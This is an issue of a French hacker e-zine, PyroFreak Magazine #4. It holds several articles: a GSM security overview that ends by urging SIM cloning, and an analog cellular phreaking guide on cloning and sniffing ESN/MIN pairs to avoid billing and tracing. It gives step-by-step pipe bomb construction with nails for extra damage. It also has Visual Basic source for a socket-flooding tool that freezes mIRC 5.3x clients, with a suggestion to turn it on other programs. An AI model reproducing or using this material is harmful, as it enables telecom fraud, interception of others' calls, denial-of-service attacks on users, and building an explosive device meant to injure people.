L'utilisateur d'un cellulaire est identifie par un numero appele
le IMSI (International Mobile Subscriber Identity) k'on peut assimiler a 
l'ESN des cells analogiques (voir NoRacell 2.X). Il faut noter kil est 
couple d'un autre numero cle (key) appele le Identification Subscriber
Authentication Key ke l'on abrege en "Ki". Le fonctionnement de ce
systeme de securite est tel kil ne communique jamais directement ces infos
sur le canal radio. Le systeme utilise a la place, un mecanisme d'interro-
-gation-reponse entre le cellulaire et la centrale.
Les conversations, elles, sont envoyees dans les airs apres etre passees
par une autre key aleatoire cette fois. On l'appelle la Ciphering Key abregee
en "Kc".
En ce ki concerne l'identification du mobile en lui meme lorskil est allume
mais en dehors d'une communication, le systeme utilise un autre number lui
aussi temporaire pour plus de securite : le TMSI ou Temporary Mobile 
Subscriber Identity.

Ce systeme de securite est physiquement base sur 3 parametres contenant 
chacun des elements d'encryptage :

-La carte SIM (Subscriber Identity Module) : elle contient le IMSI, la "Ki"
ainsi ke sont algo de generation le A3, la "Kc" et son algo le A8, et pour
finir le PIN number de l'utilisateur (numero personnel de verouillage du
combine).
-Le cellulaire en lui-meme : contient l'algo de generation principal le A5
(celui dont une partie a ete diffusee sur le net en juin 1994).
-Le reseau GSM ou la centrale : detient evidement les Algo A3, A5, et A8
pour le decryptage des donnees a l'arrivee. La centrale detient aussi 
toutes les databases concernant les users : les IMSI de chacun, le TMSI, 
les LAI (Location Area Identity), et egalement la "Ki" de chacun.

Ces 3 parametres sont donc indispensables pour placer un appel et la 
multiplication des algo assure un bon rampart contre le phreaking.
Mais kome vous avez pu le constater, presque tout est contenu dans la carte
SIM, c'est donc a ca k'il fo s'interesser :). En effet, si tous ces numeros
peuvent etre clones, on a de fortes chances ke ca marche.


        __||                                        TMSI 
       | _ |                                       /
       ||_||                                  ___ /
       |   | ----> A5                        | @ | ----> IMSI
       |   |                                 |   | ----> Ki (A3)
       |___|                                 |___| ----> Kc (A8)
                                                 \
        GSM                                   SIM \
                                                   LAI


Traitement de l'information par la centrale pour ouvrir la ligne
----------------------------------------------------------------

Comme dit plus haut, l'appel sera possible si la SIM, le cell, et la 
centrale sont d'accords.
Dans le reseau de la centrale, l'information relative a la securite est 
traitee par le centre d'autentification (AUC). Le AUC est charge de generer
une sequence necessaire au traitement de ces data. Il genere donc
le RAND puis recoit le SRES.
Le RAND est un nombre de 128 bits genere de facon aleatoire et envoye au
cellulaire. Le cellulaire (ou plutot la SIM) calcule une reponse de 32 bits
appelee SRES en fonction de sa "Ki" propre, generee, elle, par l'algo A3.
En recevant cette reponse (SRES) la centrale verifie en refaisant le calcul
et identifie ou non le cellulaire comme etant valide. Notez ke la "Ki" n'est
jamais transmise dans les airs, elle reste sur la SIM tout comme le IMSI.

   
   |               __                        | 
  /_\             | @|                      /_\
 /___\ -->RAND--> |  | -->Ki(A3)-->SRES--> /___\ --> Ouverture de la ligne
/     \           |__|                    /     \

Centrale          SIM                    Centrale


Encryptage des communications vocales et confidentialite
--------------------------------------------------------

La SIM contient, comme dit plus haut, la "Kc" (ou key d'encryptage des 
communications vocales de 64 bits) ainsi ke sont algo le A8. La "Kc" use
le meme numero aleatoire envoye par la centrale : le RAND. Le A8 genere donc
avec la "Ki" de l'utilisateur la "Kc". Cette cle d'encryptage "Kc" est
regulierement changee par la centrale :(.
De la meme maniere ke pour la "Ki", la "Kc" n'est jamais revelee et reste
toujours dans la SIM. Elle est d'ailleurs calculee a l'interieur.
Une fois cette cle d'encryptage generee (Kc), la centrale fait une demande
de communication avec le cellulaire et c'est la qu'intervient l'algo de
generation A5 contenu dans le combine. Le decryptage et l'encryptage se fait
grace au A5 et a la "Kc".
Enfin, pour confirmer l'identification du cellulaire apres les procedures
citees plus haut, la centrale envoie un nombre temporaire appele le TMSI
et attend un reponse du mobile. Le TMSI est provisoire car il depend de 
la position du cellulaire, il change donc a chaque fois ke le cellulaire
change d'endroit (poa pratique pour le clonage). Le LAI (Location Area
Identification) est necessaire pour traiter le TMSI.


Conclusion
----------

Le systeme GSM est le plus sure du monde a l'heure actuelle. L'utilisation
de l'identification codee, de l'encryptage et de l'identification tempo-
-raire assure normalement une bonne securite. Il est de toute maniere
plus secure ke l'ancien systeme analogique.
Le seul moyen evident pour le phreaker est le clonage de la carte SIM.
Reste seulement a trouver un abo bien garni, et le matos pour reprogrammer
tout ca. A vous de jouer :)


Definitions
-----------

A3 : Algo d'identification
A5 : Algo d'encryptage
A8 : Algo de generation de cle d'encryptage "Kc"
AMPS : Advanced Mobile Phone System (systeme analogique)
AUC : Authentication Center
GSM : Group Special Mobile
IMSI : International Mobile Subscriber Identity 
Kc : Ciphering Key (encryptage)
Ki : Individual Subscriber Authentication Key (identification)
LAI : Locatoin Area Identity
RAND : Random Number
SRES : Signed Response
TACS : Total Access Communications System (systeme analogique)
TMSI : Temporary Mobile Subscriber Identity 



Fait pas SlasHerZ pour Pyro Phreak.fr
Je me demande !! Si je peux faire mieux !! quand dites-vous ? :)




 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| La Theorie Du Phreaking de Cellulaire Analogique
'.________ __ __ ___________ ____ ____________ _ __ ____SlasHerZ __


La Theorie Du Phreaking de Cellulaire Analogique.


Ce Filez est destine a vous apprendre les bases du Cellular phreaking mais 
en francais pour pas vous fatiguer :) Eh bin ouais g'lai fait pour vous 
mes ptits loups... :). Ceci n'est que la theorie du phreaking, toutes les 
sections de reprogrammage sont disponibles sur le web... PS : Ceci n'est 
pas exclusivement une traduction, g remanie le filez a ma maniere et 
ajouter kelkes explikations made in me. :))

Note : Ce filez est uniquement valable pour les cellulaires analogiques. Les
Cellulaires dit "digitaux" ou "numeriques" ne sont poa phreakables pour 
l'instant.


PART I

Cellular Phreaking : Bases

Kan on fait un appel avec un cellulaire, ca transmet 3 numeros importants a 
l'identification du cellulaire : le ESN (numero de securite electronique), 
le MIN (numero d'identification du mobile) et le SCM (numero de Sation Class 
Mark c-a-d la marque du cellulaire). Ces 3 N sont envoyes a la centrale avant 
le numero de phone et vous pouvez l'entendre apres avoir presser le bouton SND 
'SEND' sur votre phonetel par un petit buzz tres court. Ces 4 elements sont les 
conditions necessaires pour ke la centrale vous donne une communication facturee 
(enfin jve dire poa a vous mais kelle ait l'impression) en verifiant ke le 
cellulairen appartient bien a l'utilisateur en kestion.

Il y a normalement 2 compagnies de phonetel cellulaire dans une zone. L'Une est la compagnie
avec un reseau a lignes (Band B) l'autre est la compagnie a reseau hertzien (Band A). Chaque
Band possede 416 canaux ce qui fait en tout 832 canaux :). Dans ces band de canaux il ya des
des sous-canaux qui eux transmettent les infos de la centrale juskau cellulaire.

Le ESN (numero de securite electronique) et le MIN (numero d'identification du mobile) sont
les 2 premiers identificateurs pour n'importe kel cellulaire. En changeant les 2, la centrale
va accepter l'appel et le facturer vers un mauvais compte ou un compte fictif qui pour elle 
sera kome un compte non deconnecte. La centrale va checker les 2 autres elements a savoir
le SCM (la marque du cellulaire) et le numero de telephone du cellulaire pour s'assurer que 
c'est un telephone cellulaire du marche.

Le fait de changer le SCM (numero de marque du cellulaire) vous empechez la centrale de con-
naitre le type de phonetel ki fait l'appel. En faisant ainsi, vous vous protegez du tracage 
puisque ces connards chercherons une marque en particulier alors que votre cellulaire phreake
est fictif. KEwl. Par exemple : vous pouvez dire ke vous utilisez un phonetel Ericsson 
alors ke vous uilisez un Motorola... :)

Il reste un numero hyper important le NAM (numero d'assignement du module) qui contient tout ce 
qui peut etre reprogrammer seulement grace au handset (la programmation direct par les touches 
du cellulaires, donc par le consommateur neophite :) ). En gros le NAM correspond au chiffres
qu'il faut taper pour mettre la ligne du cellulaire en service. Dans ce NAM il ya plein de sous
numeros qui definissent des parametres comme de SIDH (Systeme d'identifictation du mobile). 
Vous l'aurez compris le SIDH determine la localisation du cellulaire et des frequences (villes).
Reprogrammer un SIDH ne prend que kelkes minutes mais faites attention de verifier que le ESN 
(numero de securite electronique) est toujours envoye a la centrale car s'ils voient k'il ne 
correspond poa a un phonetel en service ou a un phonetel possedant un faux ESN alors ils 
bloqueront le service. La seule solution apres ca c de reprogrammer le ESN.

******************************************************************************************

PART II

Definitions 

La liste qui suit definit les termes communs utilises pour le phreaking de cellulaire.
Rem : Je vais les citer en anglais pour vous retrouver avec les autres txt en english ;).

Tous les numbas ki suivent sont contenus dans le NAM (Numero d'assignement du module). 

SIDH (System Identification for the Home System) dans le NAM
Un champ de 15 bits situe dans le NAM. Habituellement, c un
numero a 5 digits : 

Digit 1: Haut parleur interne, 0 enable
Digit 2: Local Use Mark, 0 ou 1. (voir plus loin)
Digit 3: MIN Mark, 0 ou 1. (voir plus loin)
Digit 4: Rappel Auto, Toujours sur 1 (enabled).
Digit 5: Second numero de telephone ??? (pas sur tous les phonetel), 1 pour enable.
Digit 6: Divers (Deux antennes, poa tous les phonetel), 1 pour enable.

LU (Local Use Flag) 
Dit au cellulaire de se prepresenter au system c'est a dire de transmettre les 
paramettre de connection a la ligne des la pression sur la touche 'deccrocher' du cellulaire. 
1 enable. Mettez theoriquement sur 1. Sinon le cellulaire entamera une postpresentation c'est a 
dire apres avoir entre le numero de telephone.

MIN1 (Mobile Identification Number 1) 
Un champ de 24 bits representant le numero de telephone du mobile (tres important)

MIN2 (Mobile Identification Number 2) 
Un champ de 10 bits representant le code zone (area code) du MIN.

MIN1+MIN2 
Representent a eux deux le numero de telephone a 10 chiffres du cellulaire.

MIN MARK (Mobile Identification Number Mark) 
Repere de 1 bit ordonnant ou non l'envoie du MIN2 lors d'un appel, donc le code zone (area code)
du cellulaire. 1 enable. Mettez sur 1.

SCM (Station Class Mark ou marque du cellulaire) 
Un champ de 4 bits designant la marque du cellulaire.

IPCH (Initial Paging Channel for Home system) 
Un champ de 11 bits designant le canal initial a choisir pour le system du domicile.
Normalement c'est 334 pour les systemes de centrales avec reseau a lignes et 333 pour 
les systemes de centrales avec reseau hertzien. Mais la plupart des cellulaires ont leur
propre canal ou un canal different.

ACCOLC (Access Overload Class) 
Un champ de 4 bits designant le status du cellulaire dans le systeme. Kewl ce truc :). Le but
de cette option est de donner un priorite a certain cellulaires kome ceux des ambulances :).
Le choix normal est 0 + la derniere digit du N telephone du cellulaire. Les telephones de test
sont a 10, les vehicules d'urgence a 11, 12, et 15 est reserve (probablement la police, les 
pompiers ou les militaires : a ne poa untiliser biensur).

PS (Preferred system) 
Un Champ de 11 bits designant le systeme preferrentiel. il est en rapport avec le 
IPCH (Initial Paging Channel for Home system). Si il est regle sur 0, les canaux allant
de 334  666 (Satan!) seront utilises. Si le PS est sur 1 les canaux allant de 1 a 333 seront
utilises. Les numeros de systeme 'even' necessitent un PS en 0, les numeros de systeme 'odd'
necessitent un PS en 1.

GIM (Group Identification Mark)
Un champ de 4 bits dictant a la centrale du cellulaire la limite de verification dans le 
SIDH pour determiner si c'est un cellulaire environnant qui devrait avoir un agrement de zone
avec la centrale. Habituellement regle sur 10. (jsais c poa tres tres clair mais jessaye
d'interpreter le mieux possible :)...)

LOCK DIGITS 
Un champ de 4 bits designant le code d'acces au cellulaire (code perso). La digit 0 dans le 
LOCK CODE est representee par un A dans le NAM en hexadecimal. Le code par defaut est 000.

EE (End-to-End)
Un repere de 1 bit ordonnant au cellulaire de traiter les tones en DTMF du cellulaire de 
maniere plus longue c a dire en mode standard car celle du cell sont trop courtes.
Cette option est necessaire pour les services a touches. 
...VMB :-)... PABX :-)...

REP (Repertory) 
Un repere de 1 bit annoncant ke les numeros mis en memoires sont enable. 1 enable.

HA (Horn Alert) 
Un repere de 1 bit annoncant ke la sonnerie du cellulaire est enable. 1 enable.

HF (Hanf Free) 
Un repere de 1 bit annoncant ke la fonction mains libres est activee. 1 enable.


PART III

Formats de NAM standards

Les NAM sont generalement programmer de facon analogue dans tous les cellulaires. Ce chapitre
explique les digits et les reglages communs pour la plupart des NAM.

ETAPE DESCRIPTION NOMBRE DE DIGITS REGLAGE PAR DEFAUT
--------------------------------------------------------------------------
1 3 1ere digits 3 XXX
du N de PHONE

2 4 dernieres digits 4 XXXX
du N de PHONE

3 Lock Code(LOCK) 3 ou 4 XXXA ou XXXX 

4 Code zone (MIN2) 3 XXX
=(area code) 

5 Systeme d'ID mobile
ID No. (SIDH) 4* XXXX

6 Horn Alert (HA) 1 0 or 1

7 Hands Free (HF) 1 0 or 1

8 End-to-End Signalement 1 1
(EE)

9 Repertory Mark (REP) 1 1

10 Group Identification 2 10
Mark (GIM)

11 Access Overload Class 2 XX*
(ACCOLC)

12 Station Class Mark (SCM) 4* XXXX

13 Local Use Mark (LU) 1 1

14 Min Mark (MIN) 1 1

15 Initial Paging Channel 3 333 ou 334*
(IPCH)

16 Preferred System Mark 1 0 or 1*
(PS)

Notes :

1. Le SIDH (Systeme D'identification de la zone) est compose normalement de
cinq digits et quatre suffisent pour les USA.

2.Le numero d'Access Overload Class (2 didgits) est normalement compose d'un 0 plus le dernier
chiffre du numero de phone du cellulaire. Certains systemes sont regles a 15 ou 00.

3.Le numero de Station Class Mark (SCM, la marque du cellulaire) est compose de 4 digits.

4.Le Initial Paging Channel est 334 pour les ligne a reseau par fil, 333 pour les systemes a
reseau hertzien.

5.Le numero de systeme preferrentiel (Preferred Mark System, PS) doit etre regler sur 0 pour 
les reseaux a fil, sur 1 pour les reseaux hertziens.

PART IV

Le numero de securite electronique, ou numero de serie, ou ESN

Quand un cellulaire est achete avec sa boite, l'ESN est normalement livre avec la doc ou sur un
autocollant situe sur le phonetel. Ce ESN est le bon et la mise en service se fait alors vite.
Si le cellulaire a ete bloque par la centrale pour non payement de la facture telephone, la 
personne qui veut remettre en service le cellulaire doit posseder cet ESN de facon a reprogram
-mer le systeme avec un nouveau ESN et un nouveau MIN (il sont en rapport car le MIN contient
le numba de telephone qui est en fonction de l'ESN). Chaque fabriquant determine son propre ESN,
mais il est possible qu'ils en possedent en commun. Par exemple, il peut y avoir un Motorola 
avec un ESN a 123456, et un Audiovox avec un ESN a 123456 (OK ?...).
Partant de ce principe, il est possible de phreaker un ligne sans changer l'ESN, mais plutot le 
SCM (Station Class Mark) (pour faire croire ke c'est un autre phonetel).

L'ESN est un nombre de 32 bits, ki defini chaque unite portable. Cet ESN est porgramme en usine
et ne peut etre modifie. Il faut alors commander une puce vierge du meme modele et la reprogram-
-mer avec nos propres parametres. L'ESN de la puce peut ou non etre en relation avec celui inscrit
sur le chassis du cellulaire. L'ESN est encode dans des messages qui sont transmis a la centrale
du cellulaire. Il doit vous etre demande lors de la mise en service. L'ESN est un nombre a 
11 digits. LES 3 PREMIERS NOMBRES DESIGNENT LE CODE DU FABRICANT...LES 2 SUIVANTS SONT RESERVES
(MAIS DOIVENT CONTENIR DES 00 OU DES CHIFFRES) ET 6 RESTANTS REPRESENTENT LE NUMERO DE SERIE...

PART V

Identifier l'ESN de votre cellulaire.

Dependant du modele de votre phonetel, votre ESN sera situe sur la PROM. La PROM, petite puce,
est porgrammee en usine et habituellement installee avec ,un fusible de securite contre le pira-
tage. Le code sur la PROM devrait etre obtenu en detachant la puce du cellulaire, en la mettant
dans un lecteur de PROM, et en obtenant ainsi une image de sa memoire.

La PROM d'un cellulaire possede de 16 a 28 broches. C'est une PROM bipolaire.(Voir ESN.GIF).
La majorite des cellulaires acceptent la puce de type semiconducteur 32x8 PROM, qui detient
l'ESN et ne peut poa etre reprogramme. Si l'ESN est konu, il est possible de detecter le plan
de la memoire en installant la PROM dans un lecteur de PROM, et en obtenant le schema du fusible
de protection en nickant le "READ MASTER" switche (un ptit jumper koi) grace au reprogrammeur.
De plus, la plupart des prog de reprogrammation de PROM ont la possibilite de verifier et com-
parer la programmation d'une PROM avec une autre.

La puce contenant l'ESN est de couleur noire uniforme (normale, hehe), avec de 16 a 28 broches,
rectangulaire (enveloppe ceramique) ou carree (enveloppe plastique, plus petit). Fonctionnellem-
-ent ce sont les memes chips mais celui en plastique est utilise dans les plus petits cellulaires.
Il ya des inscriptions dessus grace auxkelles vous pourrez les reconnaitre :
MMI, TI, NS, HARRIS, NSC, MB, DM, HM, AMD(hehe), TBP, MOTOROLA(hehe good), AMPS.
Lorsque vous avez localiser le chip, essayez d'en acheter un nouveau en prenant soin de relever 
ses referrences. Ou ca ? bah chez n'importe kel fournisseur electronique, sur commande. (achetez
en plusieurs c mieux, au moins 3). :)

PART VI

Scanner et trouver la paire ESN/MIN correcte

Bon si vous n'avez toujours poa compris, l'ESN et le MIN du cellulaire doivent etre changes
ou sinon ca marchera poa. C'est obligatoire pour eviter la facture de phone :). Si vous avez
un ESN et le n de telephone (MIN), vous pourrez appeler partout kan vous voulez sans peur 
d'etre trace, sans meme un facture :)). La demarche ideale serait de scanner le canal 
d'emission de frequence (voir plus loin), enregistrer et afficher les ESN.

Tous les codes sont envoyes en Hexadecimal, en NRZ code quand un abonne fait un appel. Et tous
les cellulaires ont un emetteur/recepteur NRZ ! :). Tout ce kon a faire c'est d'avoir un
recepteur sur le canal d'emission de frequence (voir plus loin), capter les infos des autres 
abonnes.

Les cellulaires communiquent en full duplex c'est a dire k'ils recoivent en meme tant k'ils
emettent. Un canal est utilise pour la transmission de la centrale au phonetel, une autre de
du phonetel a la centrale. Les frequences qu'envoie la centrale au cellulaire sont exactement 
plus hautes de 45Mhz que celles qu'envoie le cellulaire a la centrale.
et ces deux canaux sont incrementees de 30Khz entre chaque frequence #1 a #1023. (rem : il 
n'y a poa de canal entre #800 et #990).

Avec certains systemes (poa tous) la transmission du cellulaire est envoyee d'abord a la 
centrale puis renvoyee sur la meme frenquence de la centrale. Kan cela est fait, un scanner de
frequences peut ecouter les deux cotes de la conversation en ecoutant simplement la frequence
de la centrale :)). Voila pkoi, lorsque vous entendez une voix parfois dans votre sans fil
d'appart vous captez les voisins mais eux ne peuvent poa vous capter (parceka ce moment la,
votre phone est en full duplex).

***Vous pouvez trouver la liste des frequences d'un cellulaire dans le fichiers Cell-Freq.txt****
*******Ou procurez vous Cellular Manager 2.00 ki donne la liste des toutes ces frequences********


Maintenant, une petite methode pour trouver les frequences utilisees dans systeme de cellulaire,
et leskels sont dans kels cellulaires. Si le systeme utilise OMNICELLS, kome la plupart, vous 
pouvez facilement trouver tous les canaux de votre cellulaire si vous en konaissez juste un 
grace aux tables de frequences suivantes.

Les frequences d'un cellulaire sont assignees par un n de canal, et pour tous les canaux, 
c a dire les deux groupes reunis a savoir reseau hertzien, et reseau cable, la formule est :

Frequence de reception = (numero du canal x 0.030 Mhz) + 870 Mhz
Frequence d' emission = (numero du canal x 0.030 Mhz) + 825 Mhz

Ce qui donne ex : pour le canal N1 de la band A 0.030 + 870 = 870.03 Mhz

La BAND A utilise les canaux de 1 a 333. Pour construire un tableau de frequences de cellulaire,
mettez la canal 333 dans le coin en haut a gauche du tableau. La prochaine a droite sera le canal
332(hehe, normal), le prochain 331(arf)...juskau canal 313. Mettez le canal 312 en dessous du 333,
le 311 en dessous du 332 etc... OK ? :)). Chaque canal en haut du tableau est normalement le 1ere
canal de chaque cellulaire du systeme. Chaque canal en bas du tableau dans la meme colonne est la
prochaine frequence assignee a ce cellulaire. Habituellement le canal utilise pour les infos
est le plus grand numero de canal dans le cellulaire. (Si vous avez rien compris, relisez en 
regardant les tableaux qui vont suivre, c tres explicite :)).

De meme, la BAND B utilise les canaux de 334 a 666. La, le tout premier numero de canal sera 334
en haut a gauche, 335 la prochain sur la droite... Attention ! Ici le canal utilise pour les 
infos sera le canal qui aura le nombre le plus petit dans chaque cellulaire.

J'aurai les frquence bien vite !! tk je l'espre !

Jespere ke ce ptit filez vous a ete profitable...
SlasHerZ



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Pipe bomb  la endrix!!!
'.________ __ __ ___________ ____ ______________Par Neuro et Endrix __



Pipe Bomb  la endrix :)
-----------------------


Vous devez tenir compte qu'une pipe bomb est TRS dangeureux. Sa
construction peut tre dangeureuse.. C'est pourquoi je vous demande
de faire trs attention en la construisant et sourtout avant de la
faire exploser, tout vrifi pour ne pas qu'elle vous pete dans la
face, car si c'est le cas, vous risquez d'tre trs srieusement
blaiss et mme possible d'y laisser votre peau. Je veux aussi dire
que je ne fais que vous informer avec ce texte, je vous incite pas
 la faire!!! Alors s'il y arrive un problme en fesant exploser
cette bombe, si vous vous faites mal.. Bien je ne suis en
AUCUNEMENT RESPONSABLE DE VOS GESTES !!! Je ne fais que vous
instruires........

anyway

Pipe Bomb :

la force de cette bombe est du a la compression avant explosion..
Quand la pression  l'intrieur est devenu trop lev pour qu'elle
reste intacte, BAAAAAAOOOOOOMMMMMMMMMMMMM!!!!!!!!!!! Ce qui veut
dire, construiser la minucieusement.. :)


Matriels : - Ciseau (Trs coupant)
 - Pourdre a canon (vous pouvez en prendre dans des jeux 
              d'artifices)
            - Condom :)
            - Gaz
            - Tuyau de plastique ou mtal avec 2 bouchons
            - Clous (optionnel)
            - Duck TAPE!
            - Mche
            - Perceuse

Construction : 1 - Dfaire le feux d'artifice pour y prendre la 
 poudre et aussi pour prendre la mche.

Note : Y aller doucement pour ne pas faire partir le 
       jeux d'artifice dans votre maison ou, comme moi, 
       dans votre laboratoire(remise).


2 - Prendre le toyau, bloquer un bout avec un bouchon.

Note : il faut que ce soit TRS solide pour qu'il y ai
       assez de pression pour provoquer l'explosion.


3 - Prendre le condom, le mettre dans le tuyau, remplir
    le condom de gaz pour qu'il fasse juste dans le
    tuyau et faire un noeu au bout pour empcher le gaz 
    de s'chapper.


4 - Mettre de la poudre au bout, ou le condom finnit...
    Parce que quand on va allumer la poudre, on veut
    qu'elle fasse partir le gaz pour faire le gros boum !

Note : Remplir jusqu'au bord mais il faut laisser de la
       place pour pouvoir boucher cet extrmit du tuyau.


5 - Percer un PETIT trou dans le bouchon restant. Je vous
    conseille d'en utiliser un qui se visse de manire a
    ce que si vous voullez faire une modification a votre
    bombe, il est plus facile en dvissant qu'en dcollant =P

Note : il faut faire un trou assez gros pour y laisser
       passer la mche mais assez gros pour que le feu
       entre dans la pipe bomb...


6 - Mettre du tape  l'entour de la mche, sans obstruer
    l'orifice ou la flme va passer. 


7 - Avec le tape, il faut accroch des clous  l'entour de
    la pipe bomb.

Note : Le plus qu'il va y en avoir, le plus de domage il va
       y avoir :)))))

8 - Maintenant elle est prte a faire exploser :))))))))


Voici le motif de la bombe :


         \!/ <------ Flme, qui veut dire... RRRUUUUUUNNNNNNNNN!!!!!
          |
          | <--- Mche
          |
         ||| <---- Bouchon qui se visse
        ||
        |   |
        |   |
        |   |
        |   | 
        |   |   <---- Toyau de plastique ou Mtal
        |   | 
        |   | 
        |___|
          
          ^
          |____ Bouchon qui ne se fisse pas

Enfin on peut dire que c'est un ptard a mche gant!



En tk.. M'a vous dire que si vous suivez mes instructions  la lettre la,
c'est sur que vous vous allez tre capable de faire pter n'importe quoi!
Mais n'oubliez pas de faire attention  la construction de la bombe et
comment vous allez la faire pter !!!

Play safe ]...[ endrix



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| mIRC 5.3x Exploit encore efficace!
'.________ __ __ ___________ ____ __________ __ ____Par CyberRider __




Bon bon Cette semaine en allant sur irc je me suis rendu compte encro que 
plusieur personne avait encor mirc 5.3x et vous vous souvenez du bug qui 
freezais les ordi accause de mric 5.3x bon sois vous savez que c est 
depasasser ou sois que vous ne saviez pas hey bien maintenant que c'est 
pomal mort essayons de faire le program pour pouvoir freezer le mirc 5.3x hmmmmmm 
binsur les source que ej vais ecrire vont etre en Visual Basic (moi je prend le 5.0) 
et utiliseron les controel de upd et tcp de Netmanage (activex60) ok ce sera 
seulement une tite source car javais rien a ecrire et je veut ecrire kekchose 
bon!! ok commencon sur notre feuille de programmation Now!

Bon on a une feuille et la on veut les controel de netmanage donc on va aller 
laoder netmanage Winsock Controle! ok c simple! Bon vous voulez netmanage car 
vous avez po cette cochonerie de netmanage winsock controle bon bon aller la
http://www.warforge.com/cgi-bin/dlpro.cgi?windows/dos/filesneeded/activex602.zip

ok c cool on la sa prend apenne 6 mo entk bon retournons a la programmation de 
ce petit util bin simple bin depasasser qui sert kasdiment pu a rien (aussi 
lame qu un Nuke) mais bon c simple a faire!!! bon go!

bon aller la on a tous bon criss enfin on commence!!! ok bon un vu que sa rapport 
au net tu criss le socket de TCP sur ta feuille bon euh je le dis juste maintenant 
as stu palte tu peut surment etre capable de le fair avec mswinsck.ocx aussi mais 
bon lol moi jle fait avec netmanage ;) lol!! entk bon go go go!!

ok le controle tcp est maintenat sur notre feuille donc on peut etablir des 
connection sul net! (sa marche aussi si vous avez 2 pc en resaux pis que ta 
soeur est sur mirc pis qua veut po lacher le net accause que c est une accro 
pis que la toi tu veut la planter bin tu fa comme si son ip sa serait le nom 
dans voissinage resaux tu entre sa a palce du ip boom la a crit Cyberride vien 
arrenger lordi la tu va alvoir et tu lui dit que papa va etre fru qua vien 
daccepter le plus gros virus!!!) 

bon la moi ma commencer a mettre tu suite sur ma feuille un boutton stop et un 
boutton start lol c un bon debut aussi ma mettre 2 text box un pour le ip et 
lautre pour le nombre de socket ensuite ma mettre une autre text pour mon status 
sa va faire plus professionel avec un status! psi aussi ma mettre la pic de lolo 
ferrari en back ground pour que sa fasse moin professionel bon faut bin trouver 
une utilit au prog ts! bon ok!!

mes box ip et lautre Socks ensuite lautre status

ensuite pour starter un peut dans le source allons dans gnrale!! bon on va i 
dclarez 2 tite variable ic sa va etre le fun ;)

Option Explicit
Dim Freeze As String
Dim Socks As String

bon nos 2 varaible son dclarez a koi y vont servire ?? hmmmm 2 sec!!! bon Freeze 
sa va etre pour le stop ou le start genre on va faire des if avec des true or false 
ts comprendo? non! ok c est cool! bon pis scok sa va etre le nombre de socks a 
utiliser! pkoi tu prend pas direct la textbox??? aille laisse moi faire je sais ske 
je fait ok!

bon!
apres le blabla innutil arrive enfin de la programmation ha bon! yetait temp!!
on va crisser sa dans notre boutton start pour que sa aille miuex bon ok liser les 
listing en dessous des ligne pour cmprendre k?

On Error Resume Next
' k bon sa spour si sa fa une erreur sa continue et fait po crasher le prog pour rien 
' bon tous 
' bon programmeur c sa!

If IP = "127.0.0.1" Then
If MsgBox("Tu va te faire des bobo a ton irc a toi???", vbYesNo) = vbNo Then
Exit Sub
' ok pour c est trois ligne ta compris?? si tu rentre ton toi sa demande si tu veut tuer 
' ton toi 
' c claire no???
End If
End If
' 2 block if parce qui a 2 if en haut!
Socks = Socks.Text 
' notre socks!
If Socks = "" Or IsNumeric(Socks) = False Then
Status = "Erreur: Sa prend des soket hein!!"
Exit Sub
' Ici c pour etre sur qui a des socket selectionner pour etre sur que sa palnte po durand 
' le prog 
' (pour etre sur que sa marhce)
End If
If IP = "" Or IsNumeric(IP) = False Then
Status = "Erreur: Sa prend un Ip !"
Exit Sub
' Sa spour que sa soit un ip bon tu peut lauter si cest pour planter ta soeur acoter sur lautre 
' ordi lol!
End If
Status = "Geling the pc lol " & IP & " (" & Socks & ")"
' status pour dire que el fun commence!
Freeze = True
' sa dit a notre tite varaible quon sen sert la!
Dim socket As Variant
Dim SockInstance As Integer
For SockInstance = 1 To Socks
Load winsock(SockInstance)
Next SockInstance
For Each socket In winsock
socket.Connect IP, "113"
Next
' ok la on a declarez 2 variable on en set une a 1 to le nombre de sock du debut! et ensuite on 
' les laod tous apres on connect le premier socket et ainsi de suite avec le Next on connect les 
' autre! Juste ce connecter?? pis son ou les commande full thrash hot man?? Tayuele pedale scon 
' veut stun buffer overflow pour geler le prog ;))) youpi!! 

bon la le reste de larticle est innutil presque mais je lecrit quand meme des 
fois que la pitier vous pogne pendant que vous etes entraint de vous connectez 
2 mille fois sur un povre client mirc 5.3x bon la on peut foutre les prochaine 
ligne a 2 place moi je dirais que sa change rien de la mettre ou pas a la 2ieme 
place mais bon c toujours mieux ok fouter sa dans le unload form et dans votre 
boutton stop!!! c cool comme sa on va stoiper toute les connection!!

If Freeze = False Then Exit Sub
' tin si sa marche po on peut po larreter hein!!!
Dim socket As Variant
For Each socket In winsock
socket.Close
Next
Status = "Stoper"
' Tin on les ferme toutes et on change le status wow!! 
bon ok javais nommer uen de mes box ip et lautre Socks ensuite lautre status 
surment pas besoin de dir a koi chacune sert hein!!

c fini on est maintenat rendu des lamer qui gele tous les mirc 5.3 sur irc wow!!! 
wow c vraiment un feeling intence que jai la!! ok bon pkois tu nous a casser la 
tete avec des chose de programmation dememe quand on aurait pu le mettre pomal 
plus petit que sa notre prog meme plus simple et bang on aurait puf aire encor 
plus de victim sans ta criss de perte de temp bon bon bon avant de chailer ts 
faut quand meme se faire du fun a le programmer hien le prog un prog en 3 ligne 
c est comme baisser et sarreter apres 2 sec c plate! bon au moin avez vous compris 
pkoi mirc5.3x plante?? reponse buffer overflow yen peu p la le prog fake kosse 
ki fa vu que le programmeur a pas son On erreur resume next hein hein hein nenon 
sa po rap avec on eror resume next la lol non mais le prog crash sa plante yen 
peut pu! bon c simple hein!

bon ce bug est tres vieux et aussi tres lame techniquement parlant! jai ecrit uen 
source parce que sa me tentais decrire dans PyroPhreak #4 lol pis javais rien 
affair eje me dit que sa peut etre ointerresant de savoir comment marche un buffer 
overflow alors dite vous que cette technique pourrait etre peut etre utiliser 
contre dautre prog example quand vous voyez sur rootshell tell prog buffer overflow 
(mais sa depend de kel buffer overflow) essaer sa vs lautre prog en chngenat le 
port 113 par le port que l app utilise je garenti pas pas le succes mais bon!! c 
pomal sa la! C est seulement une facon mais bon ya plusisuer faconn de parvenir a ces fins!! 

ok tu me dit que sa marche pas!
bon javais oublier de dir sa marche jsute sur les mirc5.3x qui on ident server enable! 
(yen a bcp)

ensuite sa mache po plus!!
a la tayeule arrete de machaler!!



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Beige Boxing
'.________ __ __ ___________ ____ ____________ _____Par Endrix ___ _



==============================
Umpeu plus sur le Beige Boxing
